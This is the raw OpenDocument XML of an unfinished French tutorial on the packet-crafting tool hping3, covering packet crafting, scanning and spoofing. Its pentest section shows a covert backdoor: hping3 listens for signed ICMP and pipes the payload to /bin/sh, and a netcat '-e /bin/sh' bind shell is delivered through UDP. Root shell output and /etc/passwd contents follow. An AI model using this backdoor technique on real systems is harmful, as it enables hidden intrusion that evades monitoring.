              <text:p text:style-name="Table_20_Contents">Hping2 permet en effet de réaliser plusieurs choses <text:span text:style-name="T1">intéressantes</text:span> comme l'envoi de paquets via les protocoles TCP,UDP ou ICMP en modifiant leurs <text:span text:style-name="T1">entêtes.</text:span></text:p>
              <text:p text:style-name="Table_20_Contents"/>
              <text:p text:style-name="P15">Nous verrons dans cet article comment l'utiliser et en quoi il peut nous être utile.</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table>
        <text:p text:style-name="P4"/>
      </text:section>
      <text:h text:style-name="P47" text:outline-level="1">Introduction</text:h>
      <text:p text:style-name="P32">hping3 est un outil réseau capable d'envoyer des paquets TCP/IP sur commande et d'afficher les réponses de la cible comme le programme ping</text:p>
      <text:p text:style-name="P32">le <text:s/>fait <text:s/>avec <text:s/>les réponses ICMP. hping3 traite la fragmentation, les contenus de paquets et les tailles arbitraires, et peut être utilisé</text:p>
      <text:p text:style-name="P32">dans le but de transférer des fichiers encapsulés dans les protocoles supportés. En utilisant hping3 vous êtes capable d'effectuer au moins</text:p>
      <text:p text:style-name="P32">les tâches suivantes :</text:p>
      <text:p text:style-name="P32"></text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Tester les règles d'un firewall</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Scanner des ports de façon avancée</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Tester les performances réseau en utilisant différents protocoles, tailles de paquets, TOS <text:s text:c="11"/><text:tab/>(type de service) et fragmentation.</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Découverte de "Path MTU"</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Transférer des fichiers même au travers de règles de firewall vraiment fascistes.</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Comme traceroute avec différents protocoles.</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Utilisation comme Firewalk.</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Détermination d'OS à distance.</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Audit de pile TCP/IP.</text:p>
      <text:p text:style-name="P32"><text:s text:c="8"/>- Beaucoup d'autres.</text:p>
      <text:h text:style-name="P46" text:outline-level="1">Installation de HPing3</text:h>
      <text:h text:style-name="P41" text:outline-level="2">Sous Linux</text:h>
      <text:p text:style-name="P20">Installez le paquet hping3 avec votre gestionnaire de paquet préféré.</text:p>
      <text:p text:style-name="P20">Par exemple, si vous utilisez aptitude :</text:p>
      <table:table table:name="dvp_code_shell_1" table:style-name="dvp_5f_code_5f_shell_5f_1">
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_1.A" table:number-columns-repeated="5"/>
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_1.F"/>
        <text:soft-page-break/>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_1.1">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.A1" office:value-type="string">
            <text:p text:style-name="P10">shell</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.A1" office:value-type="string">
            <text:p text:style-name="P10">0</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.A1" office:value-type="string">
            <text:p text:style-name="P10">1</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.F1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
        </table:table-row>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_1.2">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_1.A2" table:number-columns-spanned="6" office:value-type="string">
            <text:p text:style-name="P16">aptitude install hping3</text:p>
          </table:table-cell>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P20"/>
      <text:h text:style-name="P41" text:outline-level="2">Sous Windows</text:h>
      <text:h text:style-name="P46" text:outline-level="1">Envoyer un paquet</text:h>
      <text:p text:style-name="P21">Pour envoyer un paquet, il suffit d'entrer la commande suivante :</text:p>
      <table:table table:name="dvp_code_shell_2" table:style-name="dvp_5f_code_5f_shell_5f_2">
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_2.A" table:number-columns-repeated="5"/>
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_2.F"/>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_2.1">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.A1" office:value-type="string">
            <text:p text:style-name="P10">shell</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.A1" office:value-type="string">
            <text:p text:style-name="P10">0</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.A1" office:value-type="string">
            <text:p text:style-name="P10">1</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.F1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
        </table:table-row>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_2.2">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_2.A2" table:number-columns-spanned="6" office:value-type="string">
            <text:p text:style-name="P11"><text:span text:style-name="T2">Hping3 site -p 80 -a ip -S</text:span><text:span text:style-name="T2"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:26:17</dc:date><text:list text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">À vérifier</text:span></text:p></text:list-item></text:list></office:annotation></text:span></text:p>
          </table:table-cell>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P21">Site est l'url ou <text:s/>l'adresse ip de destination de votre paquet.</text:p>
      <text:p text:style-name="P21">-p 80 indique le port sur lequel votre paquet sera envoyé.</text:p>
      <text:p text:style-name="P21">-a ip permet d'indique l'ip d'origine qui sera écrit sur votre paquet.</text:p>
      <text:p text:style-name="P21">-S  <text:span text:style-name="T10">initialise le flag tcp à SYN</text:span></text:p>
      <text:p text:style-name="P32">Les autres types de flags employables peuvent être utiliser grâce au paraètres suivants :</text:p>
      <text:p text:style-name="P32">-F : FIN</text:p>
      <text:p text:style-name="P32">-R: RST</text:p>
      <text:p text:style-name="P21">-<text:span text:style-name="T10">P : PUSH</text:span></text:p>
      <text:p text:style-name="P21"><text:span text:style-name="T10">-A : ACK</text:span></text:p>
      <text:p text:style-name="P21"><text:span text:style-name="T10">-U : URG</text:span></text:p>
      <text:p text:style-name="P21"><text:span text:style-name="T10">-X: XMAS</text:span></text:p>
      <text:p text:style-name="P21"><text:span text:style-name="T10">-Y : YMAS</text:span></text:p>
      <text:p text:style-name="P21"><text:span text:style-name="T10"/></text:p>
      <text:p text:style-name="P32">D'autre part HPING3 dispose d'une multitude d'options permettants de forger minutieusement des paquets faisant de lui un outils redoutable en matière de firewallking, firewall bypassing et de fuzzing tel que :</text:p>
      <text:p text:style-name="P32">-O : initialise un champ « data offset » sur mesure</text:p>
      <text:p text:style-name="P32">-M : spécifie le numéro de séquance à employer</text:p>
      <text:p text:style-name="P32">-L : initialise un TCP ACK</text:p>
      <text:p text:style-name="P32">-Q: collecte et affichage du numéro de séquance </text:p>
      <text:p text:style-name="P32">-b ou –badcksum : envois des paquets avec un mauvais checksum UDP/TCP</text:p>
      <text:p text:style-name="P32">--tcp-timestamp : acive l'option d'orodatage TCP et essaye de devinerla fréquence de mise à jour de ce champ sur la cible.</text:p>
      <text:p text:style-name="P32">Cette option est importante dans la mesure ou de nombreux bug y sont recensé car son implémentation varie en fonction des OS rendant assez instable la cohabitation dans un environnement hétérogène (fuzzing mais aussi firewall bypassing).</text:p>
      <text:p text:style-name="P32"><text:soft-page-break/><text:s/></text:p>
      <text:p text:style-name="P21"/>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="T4">Par défaut </text:span>Hping <text:span text:style-name="T4">ernvoit des paquets TCP, mais Hping permet également de changer cela en utilisant les options :</text:span></text:p>
      <text:p text:style-name="P22">-2 : pour envoyer des paquets UDP ;</text:p>
      <text:p text:style-name="P22">-1 : pour envoyer des paquets l'ICMP ;</text:p>
      <text:p text:style-name="P22">-<text:span text:style-name="T10">0 : pour envoyer des paquets RAW IP (forgés)</text:span></text:p>
      <table:table table:name="dvp_idea_1" table:style-name="dvp_5f_idea_5f_1">
        <table:table-column table:style-name="dvp_5f_idea_5f_1.A" table:number-columns-repeated="2"/>
        <table:table-row>
          <table:table-cell table:style-name="dvp_5f_idea_5f_1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><draw:frame draw:style-name="fr2" draw:name="images2" text:anchor-type="as-char" svg:width="0.847cm" svg:height="0.847cm" draw:z-index="8"><draw:image xlink:href="Pictures/100002010000002000000020D031CE58.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><svg:title>kitidea.png</svg:title></draw:frame></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_idea_5f_1.B1" office:value-type="string">
            <text:p text:style-name="P17">Vous pouvez aussi automatiser l'envois de paquets en spécifiant l'option -E fichier pour indiquer à hping un fichier contenant les données à insérer dans nos paquets.</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body"/>
      <text:h text:style-name="P48" text:outline-level="1">Écouter des paquets</text:h>
      <text:p text:style-name="P23">Hping permet aussi d'écouter des paquets grâce à l'option –listen <text:span text:style-name="T10">(ou -9)afin d'en récupérer des valeurs et donc, en jouant sur les flags, de le faire au travers d'équipements réseaux mal configurés</text:span>.</text:p>
      <table:table table:name="dvp_code_shell_4" table:style-name="dvp_5f_code_5f_shell_5f_4">
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_4.A" table:number-columns-repeated="5"/>
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_4.F"/>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_4.1">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.A1" office:value-type="string">
            <text:p text:style-name="P10">shell</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.A1" office:value-type="string">
            <text:p text:style-name="P10">0</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.A1" office:value-type="string">
            <text:p text:style-name="P10">1</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.F1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
        </table:table-row>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_4.2">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_4.A2" table:number-columns-spanned="6" office:value-type="string">
            <text:p text:style-name="P12"><text:span text:style-name="T5">Hping3 --listen signature --icmp</text:span><text:span text:style-name="T5"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:34:27</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">À vérifier</text:span></text:p></text:list-item></text:list></office:annotation></text:span></text:p>
          </table:table-cell>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P32">Dans l'exemple ci dessus <text:span text:style-name="T12">on écoute les paquets icmp contenant la signature « signature » afin d'en récupérer les données.</text:span></text:p>
      <text:p text:style-name="P33"><text:span text:style-name="T12">U</text:span>ne utilisation plus avancées sera faites plus bas en expliquant l'utilité de cette fonctionnalité redoutable !</text:p>
      <text:p text:style-name="P23"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:34:43</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">Expliquer comment fonction -signature</text:span></text:p></text:list-item></text:list></office:annotation></text:p>
      <text:h text:style-name="P46" text:outline-level="1">Scanner</text:h>
      <text:p text:style-name="P24">Hping peut aussi vous permettre de scanner les ports de votre serveurs afin de vérifier <text:span text:style-name="T11">l'état de </text:span><text:s/>vos ports.</text:p>
      <text:p text:style-name="P25">Pour scanner, rien de plus simple, il suffit de lancer cette fonction :</text:p>
      <table:table table:name="dvp_code_shell_3" table:style-name="dvp_5f_code_5f_shell_5f_3">
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_3.A" table:number-columns-repeated="5"/>
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_3.F"/>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_3.1">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.A1" office:value-type="string">
            <text:p text:style-name="P10">shell</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.A1" office:value-type="string">
            <text:p text:style-name="P10">0</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.A1" office:value-type="string">
            <text:p text:style-name="P10">1</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.F1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
        </table:table-row>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_3.2">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_3.A2" table:number-columns-spanned="6" office:value-type="string">
            <text:p text:style-name="P13">hping<text:span text:style-name="T3">3</text:span> --scan 20-80 -S site.fr<office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:28:39</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">À vérifier</text:span></text:p></text:list-item></text:list></office:annotation></text:p>
          </table:table-cell>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P7"><text:span text:style-name="T3">20-80</text:span><text:span text:style-name="T3"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:30:12</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">Expliquer plus en détail pour définir les intervals + d'autres ptions intéressantes ?</text:span></text:p></text:list-item></text:list></office:annotation></text:span><text:span text:style-name="T3"> est l'interval des ports qui seront scanné.</text:span></text:p>
      <text:p text:style-name="P25">-S site.fr indique le site à scanner.</text:p>
      <text:p text:style-name="P25"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:30:02</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">Exemple de résultat + explication</text:span></text:p></text:list-item></text:list></office:annotation></text:p>
      <table:table table:name="dvp_info_1" table:style-name="dvp_5f_info_5f_1">
        <table:table-column table:style-name="dvp_5f_info_5f_1.A" table:number-columns-repeated="2"/>
        <text:soft-page-break/>
        <table:table-row>
          <table:table-cell table:style-name="dvp_5f_info_5f_1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><draw:frame draw:style-name="fr2" draw:name="images3" text:anchor-type="as-char" svg:width="0.847cm" svg:height="0.847cm" draw:z-index="5"><draw:image xlink:href="Pictures/100002010000002000000020A90AD953.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><svg:title>kitinfo.png</svg:title></draw:frame></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_info_5f_1.B1" office:value-type="string">
            <text:p text:style-name="P18"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:29:34</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">Dire que le mieux c'est de drop les paquets quand le port est fermé : hping ne saura alors pas si le port est ouvert ou fermé</text:span></text:p></text:list-item></text:list></office:annotation></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="P49" text:outline-level="1"><text:span text:style-name="T6">Exemple d'utilisation de HPing ?</text:span></text:h>
      <text:h text:style-name="P42" text:outline-level="2">Tester et déboguer des services Web</text:h>
      <text:p text:style-name="P27"><text:span text:style-name="T19">Dans cette partie il sera notamment question de fuzzing et de stress testing en jouant sur les diverses option proposé par l'outils.</text:span><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:37:47</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">Envois de données =&gt; Hping en –listen</text:span></text:p></text:list-item><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">Réception de données =&gt; Hping en envois de données</text:span></text:p></text:list-item></text:list></office:annotation></text:p>
      <text:h text:style-name="P43" text:outline-level="2">Automatiser facilement l'envoie de données</text:h>
      <text:p text:style-name="P28"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:38:50</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">CRON + HPING qui regarde un fichier.</text:span></text:p></text:list-item></text:list></office:annotation></text:p>
      <text:p text:style-name="P26"/>
      <text:h text:style-name="P44" text:outline-level="2">E<text:span text:style-name="T12">xemple concret lors de tests d'intrusion via des technique de firewall bypassing et de reverse shell backdoor</text:span></text:h>
      <table:table table:name="dvp_code_shell_5" table:style-name="dvp_5f_code_5f_shell_5f_5">
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_5.A" table:number-columns-repeated="5"/>
        <table:table-column table:style-name="dvp_5f_code_5f_shell_5f_5.F"/>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_5.1">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.A1" office:value-type="string">
            <text:p text:style-name="P10">shell</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.A1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.A1" office:value-type="string">
            <text:p text:style-name="P10">0</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.A1" office:value-type="string">
            <text:p text:style-name="P10">1</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.F1" office:value-type="string">
            <text:p text:style-name="P10"/>
          </table:table-cell>
        </table:table-row>
        <table:table-row table:style-name="dvp_5f_code_5f_shell_5f_5.2">
          <table:table-cell table:style-name="dvp_5f_code_5f_shell_5f_5.A2" table:number-columns-spanned="6" office:value-type="string">
            <text:p text:style-name="P13">--listen signature -icmp | /bin/<text:span text:style-name="T6">commande</text:span></text:p>
          </table:table-cell>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
          <table:covered-table-cell/>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P33">Nous avons vu plus haut qu'il était possible de forger des paquets sur mesure mais aussi d'utiliser l'option -9 (-listen) afin d'écouter et extraire des données passés dans des trames.</text:p>
      <text:p text:style-name="P33"/>
      <text:p text:style-name="P33">Nous allons à présent voir concrètement l'utilité de tel paramètre et ce qui peut etre proposé lors d'un audit de type test d'intrusion.</text:p>
      <text:p text:style-name="P33"/>
      <text:p text:style-name="P33">Imaginons la chose suivante :</text:p>
      <text:p text:style-name="P33">vous avez un accés sur une machine mais pour diverses raisons vous aimeriez, par exemple avoir un accés (shell) à minuit afin que personne ne soit présent sur le poste lorsque vous serez dessus.</text:p>
      <text:p text:style-name="P33">Problème : si je laisse une socket ouverte ça va se voir</text:p>
      <text:p text:style-name="P33">Solution : hping3</text:p>
      <text:p text:style-name="P33"/>
      <text:p text:style-name="P33">Démonstration et explication.</text:p>
      <text:p text:style-name="P33">Sur le poste auquel j'ai eu un accés j'exécute la commande suivante :</text:p>
      <text:p text:style-name="P35">hping3 127.0.0.1 -9 key --safe --icmp | /bin/sh</text:p>
      <text:p text:style-name="P33">ainsi hping attendra de voir la signature cad ici « key » avant de passer ce qu'il recevra dans le <text:soft-page-break/>shell pipé derrière.</text:p>
      <text:p text:style-name="P33">De l'autre coté et aprés avoir pu établir le fonctionnement du firewall interne de l'entreprise je créé le fichier suivant « hping_backdoor » contenant les lignes suivantes uniquement: </text:p>
      <text:p text:style-name="P33"><text:span text:style-name="T13">nc -nvv -l -p 666 -e <text:s/>/bin/sh;</text:span></text:p>
      <text:p text:style-name="P33"><text:span text:style-name="T15">A présent lorsqu'il est enfin l'heure je lance ceci depuis ma machine ou une autre machine sur laquelle j'ai accés :</text:span></text:p>
      <text:p text:style-name="P34"><text:span text:style-name="T13"></text:span><text:span text:style-name="T14">hping3 10.0.0.1 --udp -p 41821 -d 100 --sign key --safe --file hping_bacdoor</text:span><text:span text:style-name="T16"> </text:span></text:p>
      <text:p text:style-name="P37">Explication :</text:p>
      <text:p text:style-name="P37">Cette requête prend en premier paramètre l'ip de la machine cible, puisque le firewall m'y oblige je passe donc par le port UDP 41821 afin de transmettre un paquet contenant ma signature « key » en spécifiant l'option « –-safe » afin que les paquets perdus soient renvoyés en totalité à ma cible.</text:p>
      <text:p text:style-name="P37">L'option « --file » va elle permettre de lire et donc transemttre le contenu de mon fichier à ma cible.</text:p>
      <text:p text:style-name="P37">Ma cible elle va lire et passer cela à /bin/sh et donc m'ouvrir un reverse shell sur lequel je vais pouvoir me connecter afin de faire... ce que je veux sur la cible !</text:p>
      <text:p text:style-name="P37">Exemple  <text:span text:style-name="T17">en pratique :</text:span></text:p>
      <text:p text:style-name="P36">nc 127.0.0.1 666</text:p>
      <text:p text:style-name="P36">whoami</text:p>
      <text:p text:style-name="P39">root</text:p>
      <text:p text:style-name="P38"/>
      <text:p text:style-name="P36">cat /etc/passwd</text:p>
      <text:p text:style-name="P38">root:x:0:0:root:/root:/bin/bash</text:p>
      <text:p text:style-name="P38">daemon:x:1:1:daemon:/usr/sbin:/bin/sh</text:p>
      <text:p text:style-name="P38">bin:x:2:2:bin:/bin:/bin/sh</text:p>
      <text:p text:style-name="P38">sys:x:3:3:sys:/dev:/bin/sh</text:p>
      <text:p text:style-name="P38">sync:x:4:65534:sync:/bin:/bin/sync</text:p>
      <text:p text:style-name="P38">games:x:5:60:games:/usr/games:/bin/sh</text:p>
      <text:p text:style-name="P38">man:x:6:12:man:/var/cache/man:/bin/sh</text:p>
      <text:p text:style-name="P38">lp:x:7:7:lp:/var/spool/lpd:/bin/sh</text:p>
      <text:p text:style-name="P38">mail:x:8:8:mail:/var/mail:/bin/sh</text:p>
      <text:p text:style-name="P38">news:x:9:9:news:/var/spool/news:/bin/sh</text:p>
      <text:p text:style-name="P38">uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh</text:p>
      <text:p text:style-name="P38">proxy:x:13:13:proxy:/bin:/bin/sh</text:p>
      <text:p text:style-name="P38">www-data:x:33:33:www-data:/var/www:/bin/sh</text:p>
      <text:p text:style-name="P38">backup:x:34:34:backup:/var/backups:/bin/sh</text:p>
      <text:p text:style-name="P38">list:x:38:38:Mailing List Manager:/var/list:/bin/sh</text:p>
      <text:p text:style-name="P38">nobody:x:65534:65534:nobody:/nonexistent:/bin/sh</text:p>
      <text:p text:style-name="P38">….</text:p>
      <text:p text:style-name="P38"><text:soft-page-break/>exit</text:p>
      <text:p text:style-name="P38"/>
      <table:table table:name="dvp_warning_1" table:style-name="dvp_5f_warning_5f_1">
        <table:table-column table:style-name="dvp_5f_warning_5f_1.A" table:number-columns-repeated="2"/>
        <table:table-row>
          <table:table-cell table:style-name="dvp_5f_warning_5f_1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><draw:frame draw:style-name="fr2" draw:name="images4" text:anchor-type="as-char" svg:width="0.847cm" svg:height="0.847cm" draw:z-index="7"><draw:image xlink:href="Pictures/1000020100000020000000205C9807F8.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><svg:title>kitwarning.png</svg:title></draw:frame></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="dvp_5f_warning_5f_1.B1" office:value-type="string">
            <text:p text:style-name="P14"><text:span text:style-name="T7">Vous pouvez même faire un pseudo-ssh en utilisant /bin/bash mais à ne faire que dans un chroot</text:span><text:span text:style-name="T7"><office:annotation><dc:creator>Neckara </dc:creator><dc:date>2013-11-11T15:42:27</dc:date><text:list text:continue-numbering="true" text:style-name=""><text:list-item><text:p text:style-name="P51"><text:span text:style-name="T20">lien</text:span></text:p></text:list-item></text:list></office:annotation></text:span><text:span text:style-name="T7">.</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="P29"/>
      <text:h text:style-name="P45" text:outline-level="2">Usurper une identité : <text:span text:style-name="T18">le spoofing</text:span></text:h>
      <text:p text:style-name="P30">Comme on peut changer l'adresse ip source <text:span text:style-name="T18">(spoofing)</text:span>, on peut se faire passer pour une autre machine, ceci permet alors de tester la sécurité et de voir la réaction de nos applications face à l'envoi de tels paquets.</text:p>
      <text:p text:style-name="P30">Ceci vous permettra de tester si votre application est sensible aux vols de connexions et autre.</text:p>
      <text:h text:style-name="P47" text:outline-level="1">Conclusion</text:h>
      <text:p text:style-name="P31">Il existe aussi :</text:p>
      <text:p text:style-name="P40">scapy : un excellent forgeur de paquets plus pointu que hping3 dans ce domaine mais moins « user-friendly »</text:p>
      <text:p text:style-name="P31"><text:span text:style-name="T18">n</text:span>map : scanner des ports</text:p>
      <text:p text:style-name="P40">netcat (nc) : <text:s/>véritable couteau suisse tcp/ip utilisé ici dans le fichier de backdooring</text:p>
      <text:p text:style-name="P8"><text:span text:style-name="T8">Telnet : envoyer/réceptionner des données. (mais ne permet pas le changement du protocole utilisé et de changer l'adresse ip source).</text:span></text:p>
      <text:p text:style-name="P19"/>
      <text:p text:style-name="P19"/>
      <text:h text:style-name="P47" text:outline-level="1">Remerciement</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Ubuntu" svg:font-family="Ubuntu" style:font-family-generic="swiss"/>
    <style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-adornments="Normal"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Courier New1" svg:font-family="'Courier New'" style:font-adornments="Normal"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499cm" fo:margin-bottom="0cm" style:contextual-spacing="false" fo:line-height="100%" style:page-number="auto"/>
      <style:text-properties style:font-name="Verdana" fo:font-size="10pt"/>
    </style:style>
    <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="text">
      <style:paragraph-properties fo:margin-top="0.499cm" fo:margin-bottom="0.499cm" style:contextual-spacing="false" fo:background-color="#280099" fo:keep-with-next="always">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:color="#ffffff" style:font-name="Verdana1" fo:font-size="14pt" fo:font-weight="bold"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Verdana" fo:font-size="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fo:text-align="center" style:justify-single-word="false" text:number-lines="false" text:line-number="0"/>
      <style:text-properties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fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false" text:number-lines="false" text:line-number="0"/>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4700b8" style:shadow="none">
        <style:background-image/>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background-color="#2300dc">
        <style:background-image/>
      </style:paragraph-properties>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background-color="#2323dc">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="13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background-color="#0047ff">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="12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background-color="#0099ff">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="12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background-color="#00b8ff" style:shadow="none">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="11pt"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background-color="#99ccff">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="11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background-color="#99ccff">
        <style:background-image/>
      </style:paragraph-properties>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background-color="#99ccff">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="10pt" fo:font-weight="bold" style:font-size-asian="75%" style:font-weight-asian="bold" style:font-size-complex="7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vp_5f_code" style:display-name="dvp_code" style:family="paragraph" style:master-page-name="">
